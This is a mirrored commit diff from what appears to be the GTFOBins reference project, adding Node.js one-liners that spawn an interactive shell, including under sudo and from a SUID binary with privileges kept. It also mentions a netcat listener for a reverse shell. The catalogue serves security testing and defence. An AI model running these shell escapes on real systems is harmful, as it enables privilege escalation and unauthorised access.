mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add node suid, sudo, and interactive
This commit is contained in:
parent
48787a0e8e
commit
af346441f2
@ -1,5 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});'
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", [ "-p" ], { stdio: [0, 1, 2]});'
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
||||
code: |
|
||||
|
Loading…
Reference in New Issue
Block a user